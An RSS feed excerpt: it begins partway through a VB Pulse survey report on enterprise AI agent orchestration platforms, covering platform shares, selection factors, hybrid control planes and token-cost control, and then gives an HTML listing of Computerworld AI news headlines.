shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 6: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 7: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 8: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing on model-provider platforms — Anthropic’s Claude leads at 40% — chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed “agents” are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The question for subsequent waves is whether the deployed reality closes the gap on the ambition — or whether the chatbot trap proves stickier than the roadmap assumes.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Artificial Intelligence]]></title>
<description><![CDATA[Latest from todaynewsDeepMind CEO again pushes for a frontier AI standards bodyDemis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.By Evan SchumanJul 15, 20268 minsArtificial IntelligenceGovernmentLaws and Regulation...]]></description>
<link>https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</guid>
<pubDate>Wed, 15 Jul 2026 23:02:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><section class="latest-content"><div class="container"><header class="latest-content__header"><h2 class="latest-content__title sr-only"><span>Latest from today</span></h2></header><div class="grid latest-content__content"><div class="col-12 col-7@md col-8@lg"><div class="latest-content__content-featured"><a class="card card--xxl " href="https://www.computerworld.com/article/4197511/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body-2.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">news</span></div><div class="card__image"><div class="insider-image"><div class="image"><img width="400px" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197511-0-18848000-1784149211-shutterstock_2540223947.jpg?quality=50&amp;strip=all&amp;w=1046" data-id="idg_render_hero_index_one_card_image" sizes="
            (min-resolution: 3dppx) and (max-width: 600px) 900px,
            (min-resolution: 3dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 2dppx) and (max-width: 600px) 900px,
            (min-resolution: 2dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 1dppx) and (max-width: 600px) 900px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1300px" alt="Image" loading="eager"></div></div></div><h3 class="card__title">DeepMind CEO again pushes for a frontier AI standards body</h3><p class="card__description">Demis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.</p><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T20:59:29+00:00">Jul 15, 2026</span></span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a>
		</div><div class="grid grid--cols-7@md grid--cols-8@lg latest-content__content-main"><div class="col-12 col-7@md col-4@lg latest-content__card-main"><a class="card " href="https://www.computerworld.com/article/4197437/apples-openai-lawsuit-the-lunacy-of-trying-to-limit-what-ex-employees-can-tell-future-employers.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197437-0-98299000-1784131210-thinkstockphotos-493608259-100632547-orig.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">Apple’s OpenAI lawsuit: The lunacy of trying to limit what ex-employees can tell future employers</h3><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:59:35+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a></div><div class="col-12 col-7@md col-4@lg latest-content__card-main"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/4197338/what-problems-would-an-ai-speaker-from-openai-actually-solve.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197338-0-98391100-1784130807-Apple-HomePod-mini-color-lineup.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">What problems would an AI speaker from OpenAI actually solve?</h3><div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:52:45+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Vendors and Providers</span></span></div></a></div></div></div><div class="col-12 col-5@md col-4@lg latest-content__content-secondary"><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4192438/how-to-unionize-your-tech-workplace.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">feature</span></div><h3 class="card__title">How to unionize your tech workplace</h3><div class="card__info"><span>By Robert Mitchell</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T11:00:00+00:00">Jul 15, 2026</span></span><span>18 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Careers</span></span><span class="card__tag"><span class="tag">IT Jobs</span></span><span class="card__tag"><span class="tag">Technology Industry</span></span></div></a>
		</div><div class="latest-content__card-secondary"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/1613762/android-widgets.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">tip</span></div><h3 class="card__title">5 wild ways to make Android widgets more useful</h3><div class="card__info"><span>By JR Raphael</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T09:45:00+00:00">Jul 15, 2026</span></span><span>12 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Mobile Apps</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4197029/microsoft-is-forcing-an-enterprise-transition-to-passkeys.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Microsoft is forcing an enterprise transition to passkeys</h3><div class="card__info"><span>By Taryn Plumb</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T02:04:06+00:00">Jul 14, 2026</span></span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Access Control</span></span><span class="card__tag"><span class="tag">Authentication</span></span><span class="card__tag"><span class="tag">Identity and Access Management</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196704/siri-ai-steals-the-show-as-the-ios-27-public-beta-lands.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Siri AI steals the show as the iOS 27 public beta lands</h3><div class="card__info"><span>By Jonny Evans</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T15:47:35+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Operating Systems</span></span><span class="card__tag"><span class="tag">iOS</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196309/with-its-latest-layoffs-microsoft-goes-all-in-on-ai.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">opinion</span></div><h3 class="card__title">With its latest layoffs, Microsoft goes all in on AI</h3><div class="card__info"><span>By Preston Gralla</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T11:00:00+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">IT Strategy</span></span><span class="card__tag"><span class="tag">Microsoft</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196652/forg365-industrializes-microsoft-365-phishing-with-ai-generated-lures.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Forg365 industrializes Microsoft 365 phishing with AI-generated lures</h3><div class="card__info"><span>By Prasanth Aby Thomas</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T09:51:16+00:00">Jul 14, 2026</span></span><span>4 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span><span class="card__tag"><span class="tag">Office Suites</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></a>
		</div></div></div></div></section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><div class="content-listing-articles"><div class="container"><h2 class="content-listing-articles__title">Articles</h2><div class="content-listing-articles__container content-listing-articles__container--collapsed" data-collapse-articles="6" data-content-listing-articles><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’</h3><p class="card__description">Analysts and consultants applaud the move as potentially delivering the development consistency that the current offerings lack, but some worry that treating the company as neutral is a mistake.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Evan Schuman</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Nonprofits</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196262/ai-is-killing-low-cost-smartphones.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">AI is killing low cost smartphones</h3><p class="card__description">Data from Omdia and Counterpoint shows that while Apple and Samsung thrive, the rest of the industry takes a dive</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Mobile Phones</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196220/meta-pulls-instagram-ai-feature-amid-privacy-concerns.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta pulls Instagram AI feature amid privacy concerns</h3><p class="card__description">By specifying a public account, users could allow the AI ​​model to use the person’s images as a reference without the account holder being notified.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Viktor Eriksson</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>1 min</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Instagram</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195176/qa-how-google-plans-to-reinvent-the-spreadsheet-with-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">feature</span></div><h3 class="card__title">Q&amp;A: How Google plans to reinvent the spreadsheet with AI</h3><p class="card__description">Soon, Google wants to see AI doing the spreadsheet busywork, says Eric Birnbaum, director of product management for Google Sheets.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Matthew Finnegan</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>10 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Google Sheets</span></span><span class="card__tag"><span class="tag">Google Workspace</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">brandpost</span><span class="card__sponsor-text">Sponsored by Tether</span></div><h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3><p class="card__description"></p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By tether</span></div> <div class="card__info card__info--light"><span>Jul 9, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">‘Rotten to its core’ — Apple files an explosive lawsuit against OpenAI</h3><p class="card__description">Apple accuses OpenAI and former Apple Vice President Tang Tan of extensive coordinated data theft and asks whether OpenAI’s hardware plans are based around exfiltrated Apple info.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">opinion</span></div><h3 class="card__title">Apple is prepping for life after the AI gold rush</h3><p class="card__description">The company's interest in compression of AI models is the right approach.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195678/microsoft-exchange-server-on-prem-gets-a-little-harder-to-use.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Microsoft Exchange Server on prem gets a little harder to use</h3><p class="card__description">The lightweight web client is going away, placing more demands on systems still clinging to Microsoft’s on-prem email system.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Email Clients</span></span><span class="card__tag"><span class="tag">Microsoft Exchange</span></span><span class="card__tag"><span class="tag">Microsoft Outlook</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195636/mistral-joins-rush-to-build-physical-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Mistral joins rush to build physical AI</h3><p class="card__description">Its Robostral Navigate AI model needs input from just one color camera, doing without Lidar, depth sensors, or multiple viewpoints.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Robotics</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195628/apple-will-buy-more-us-made-components-from-broadcom.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Apple will buy more US-made components from Broadcom</h3><p class="card__description">Chips and thin-film bulk acoustic resonator (FBAR) filters are on the menu.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Networking</span></span><span class="card__tag"><span class="tag">Wi-Fi</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195528/meta-launches-low-cost-muse-spark-1-1-as-enterprise-ai-spending-comes-under-scrutiny-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta launches low-cost Muse Spark 1.1 as enterprise AI spending comes under scrutiny</h3><p class="card__description">Meta says the model delivers competitive performance against OpenAI, Anthropic, and Google offerings while costing a fraction as much to run.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Anirban Ghoshal</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/1614899/android-contacts-management-ultimate-guide.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">how-to</span></div><h3 class="card__title">The ultimate guide to Android contacts management</h3><p class="card__description">Your Android phone's contacts are much more than just a glorified Rolodex. Ready for an unexpected productivity upgrade? </p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By JR Raphael</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>16 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Google</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195494/openai-launches-chatgpt-work-as-it-broadens-gpt-5-6-rollout-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenAI launches ChatGPT Work as it broadens GPT-5.6 rollout</h3><p class="card__description">The enterprise AI agent combines ChatGPT, Codex, and GPT-5.6 to automate workplace tasks as OpenAI broadens rollout of its latest frontier models.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Gyana Swain</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div></div><div class="grid content-listing-articles__button-wrapper">
			<div class="col-6 col-4@md col-start-5@md"><div class="content-listing-articles__button-show">
					<button class="button button--tertiary" type="button" data-toggle="expand">
						<span>Show more</span>
						<span>
							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-down"></use>
							</svg>
						</span>
					</button>
				</div>
				<div class="content-listing-articles__button-show content-listing-articles__button-show--hide">
					<button class="button button--tertiary" type="button" data-toggle="collapse">
						<span>Show less</span>
						<span>
